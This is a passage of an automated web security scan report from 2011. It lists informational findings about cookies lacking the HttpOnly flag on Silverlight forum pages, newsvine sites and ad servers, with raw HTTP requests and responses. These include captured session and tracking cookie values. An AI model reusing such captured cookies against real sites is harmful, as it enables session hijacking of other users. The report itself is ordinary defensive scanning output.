Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 238
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fsyed-amjad.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:00 GMT; expires=Sun, 29-Jan-2012 23:16:00 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:00 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fsyed-amjad.
...[SNIP]...

17.258. http://forums.silverlight.net/members/tanmoy.r.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/members/tanmoy.r.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:05 GMT; expires=Sun, 29-Jan-2012 23:17:05 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/tanmoy.r.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 236
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2ftanmoy.r.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:05 GMT; expires=Sun, 29-Jan-2012 23:17:05 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:05 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2ftanmoy.r.as
...[SNIP]...

17.259. http://forums.silverlight.net/members/thaicarrot.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/members/thaicarrot.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:38 GMT; expires=Sun, 29-Jan-2012 23:15:38 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/thaicarrot.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 238
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fthaicarrot.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:38 GMT; expires=Sun, 29-Jan-2012 23:15:38 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:15:38 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fthaicarrot.
...[SNIP]...

17.260. http://forums.silverlight.net/members/vikasamin.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/members/vikasamin.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:00 GMT; expires=Sun, 29-Jan-2012 23:17:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/vikasamin.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 237
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fvikasamin.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:00 GMT; expires=Sun, 29-Jan-2012 23:17:00 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:00 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fvikasamin.a
...[SNIP]...

17.261. http://forums.silverlight.net/members/yifung.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/members/yifung.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:07 GMT; expires=Sun, 29-Jan-2012 23:17:07 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/yifung.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 234
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fyifung.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:07 GMT; expires=Sun, 29-Jan-2012 23:17:07 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:07 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fyifung.aspx
...[SNIP]...

17.262. http://forums.silverlight.net/search/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/search/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:21:00 GMT; expires=Sun, 29-Jan-2012 23:21:00 GMT; path=/
CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:41:00 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search/ HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 23207
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:21:00 GMT; expires=Sun, 29-Jan-2012 23:21:00 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:41:00 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:21:00 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Search
...[SNIP]...

17.263. http://forums.silverlight.net/user/profile.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/user/profile.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:20 GMT; expires=Sun, 29-Jan-2012 23:17:20 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/profile.aspx?UserID=96252 HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 249
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fuser%2fprofile.aspx%3fUserID%3d96252
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:20 GMT; expires=Sun, 29-Jan-2012 23:17:20 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:20 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fuser%2fprofile.aspx%3
...[SNIP]...

17.264. http://forums.silverlight.net/user/viewonline.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/user/viewonline.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:19 GMT; expires=Sun, 29-Jan-2012 23:17:19 GMT; path=/
CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:19 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 278417
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:19 GMT; expires=Sun, 29-Jan-2012 23:17:19 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:19 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:19 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Who's
...[SNIP]...

17.265. http://health.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://health.redacted
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=1133fe74be594c568a34ac6ad24cff7a; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=CE873C51A3AB43DBA17ADCF0FD9904FA; domain=.redacted; expires=Wed, 17-Aug-2011 23:46:55 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: health.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.266. http://helenaspopkin.newsvine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://helenaspopkin.newsvine.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

vid=4166254bf39fbdb2b2c04df95de6c650; expires=Sat, 25-Jan-2031 02:07:18 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: helenaspopkin.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.267. http://ingame.newsvine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ingame.newsvine.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

vid=2f27a7911e836626553146fb369daabe; expires=Sat, 25-Jan-2031 02:07:24 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: ingame.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.268. http://js.revsci.net/gateway/gw.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://js.revsci.net
Path:	/gateway/gw.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

udm_0=MLv39SEJaSpn5l6paNmEWEzMqFRxKmlqLQZYxUOmG8ggolbMMvPsEEvJzkvhsvqTqAgDHJSkCRJECssiC+uNc0HvGBEwWMU1I/WZp2twauhl2HLuWCqVcMdoFzqPRdkboPy/4hudEhz+lsYyXiLltBm23RQ5kkhyU1jd7+S5iLCbslvM7XhfdRXs/LcG1fY/mxKKCC0YXfoQZJn9VDb2LOYFtxYmAZ6ztXcixPWz2RHsR7YVvcyJy858LTleiKLWa6VJtWUnlW1R5cEOxOVzVEPDU5JDm5FBb/PdzodlGGdSLImCnc30q3bosBAe1rCEoDlx9lkC0Z86u/7DXZA8OxpdIIZq3fm2x/Y1L/Fk6ubpQHq4yX+o7EgD8uvlSgO0rKW6DQpHvr05vHctOQCNhqTN9KtSovoK3V2XolIf+t+j8Fgr3oGrPvVMMOE+TtGi0T9GoqUGUdysI1D4HKgX2AeugvReG9yoU1WsCd96QJueeSZ9JW/hOoDAWQkWkL8cOSyJzSWMwamURPqLx+BisksqWdC/eBRvw9pXjNGRC6A2mTvF4qXnGgQTM3xjSifI+qX3GIcEGehR/kx+tOqDogRTs9TB3AAxoEuG0odnEy+DqPk52zTRte34chLZbeljSNuNAYgQnoBq4CvXsYfxEduAIt752bikdcyuIhj3DpogvW1pIzCZj7OIswr7Kn7ocfRjdAoL5T2uac/PT2Ydxc3xjy0HLBJPLbaN5HHHjdZ/T93Y0699FKXSmLQGIKZG/2yo8JITGL6MRcrdgyiTv35BCJuq368OVvIprsvvBAzlr2f4A8D5vhA7ZWI3sz30r2/s6dMS4r6GrFsgTbGEW11NGX8Jde7gdHMZiA7tQ9gNCNGwqql7QhJhTPnfqdBL+a2OE4iEDwzU5HcmCK3Y398/UWNtb+6WFgOQug8K08j5l7wrXjl372x2NFfJHBb4XQY7FFmKtDqZxGIB2GKfviK0+/3YJMKFhYlyBNuG+/5lbR1s04q8+Vl/Snxxyvwgdyv/F6uu8Sx/ED5jwkHGxKhrSD7I+9k9V2kKInbD9r9ClYHVTZvO/d9h1bs3b+wi7zbYw7cytf6R7E4UYzc9gAwi7K93pOLo9Dhkqxh8fi6awKRNuxkffO86mJh7RL+xQWFDJ8oDSPJa7pHSjDWcxrpbo+K5ZLrxrnxb78GjhpHYUxyZgCjjTpyHGwkX4vxoS3HpwxFkdG6F6w==; Domain=.revsci.net; Expires=Mon, 30-Jan-2012 01:29:41 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

17.269. http://latino.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://latino.redacted
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=3b8b0f18a4fc473bb2a2901d1486ffca; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
hpsvr=D:blu|W:F|P:W; domain=.latino.redacted; expires=Sun, 01-Jan-2017 08:00:00 GMT; path=/
hpcli=0|W.1.1; domain=.latino.redacted; expires=Sun, 01-Jan-2017 08:00:00 GMT; path=/
hpwea=wc:USNY0996; domain=.latino.redacted; expires=Sun, 01-Jan-2017 08:00:00 GMT; path=/
FlightId=BasePage; domain=latino.redacted; expires=Mon, 28-Jan-2013 23:47:08 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: latino.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.270. http://leadback.advertising.com/adcedge/lb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://leadback.advertising.com
Path:	/adcedge/lb

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=k4ZRNJpwIg02F1BCdbdRdgwUwXUHI8Y4F1BCYTeRdgQ3gZUHIQTnG1BCF2pRdgAohXUHIYZ4F1BCKGeRdgwohXUHIca4F1BCiGeRdgQshXUHwOIAM/oB0L7YCwAoGuxr1RQcKaYAGK2AI9YB7M53EkL3FJwgPXw6TVkJsuWB/0mxzfa7GIaWGDdrMaw41Zg3kq1B6bjxdp6bDwWZGu3r4fQsMaM+wa3BW8ox43I9HsfzFp/sNiQQoaUHs2DC1xmBwB; domain=advertising.com; expires=Tue, 29-Jan-2013 17:21:40 GMT; path=/
GUID=MTI5NjQwODEwMDsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; domain=advertising.com; expires=Tue, 29-Jan-2013 17:21:40 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.271. http://lifestyle.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.redacted
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=95617ed8b1e0449b8e93c4352fb8c4ef; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=F82F814B9CA14A8DA8EF5EB7228D86A7; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:11 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.272. http://lifestyle.redacted/relationships/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.redacted
Path:	/relationships/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=ad185c8cd036476ab99f219f50cae67f; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=4ACBAFEABC3E458D93445CB0BF71AA56; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:17 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /relationships/ HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.273. http://lifestyle.redacted/relationships/staticslideshowglamour.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.redacted
Path:	/relationships/staticslideshowglamour.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=3a0a17b7e3454f56a4bcc12d1023d4df; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=02D6064FB59C4177880821E6DA25C485; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:19 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /relationships/staticslideshowglamour.aspx HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.274. http://lifestyle.redacted/your-home/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.redacted
Path:	/your-home/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=a62fddde6fef43f48d53312bf038943f; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=DE365542A27E43F9A2D20EEC313CB20E; domain=.redacted; expires=Thu, 18-Aug-2011 02:09:26 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /your-home/ HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.275. http://lifestyle.redacted/your-home/room-design/staticslideshowhb.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.redacted
Path:	/your-home/room-design/staticslideshowhb.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=2d389eb7e7ea4ae0a473db58b1a5758b; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=42164453E4924CB89C5B977561EA27D0; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:29 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.276. http://lifestyle.redacted/your-life/family-parenting/article.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.redacted
Path:	/your-life/family-parenting/article.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=e5a2e16a67154266a9d498fd513a08c5; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=2588A011AE014923A2AA5BE79447364F; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:25 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /your-life/family-parenting/article.aspx HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.277. http://lifestyle.redacted/your-life/new-year-new-you/video.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.redacted
Path:	/your-life/new-year-new-you/video.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=a1ed2a58c8c240e8aa192c9ab451625e; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=1078BE57F6E649E38B580A5D9F01AA70; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:25 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /your-life/new-year-new-you/video.aspx HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.278. http://lifestyle.redacted/your-life/your-money-today/article.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.redacted
Path:	/your-life/your-money-today/article.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=0398126e49724201804ec2ac840e992d; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=57CE9474CD8C417D817D0DE1275373E2; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:23 GMT; path=/

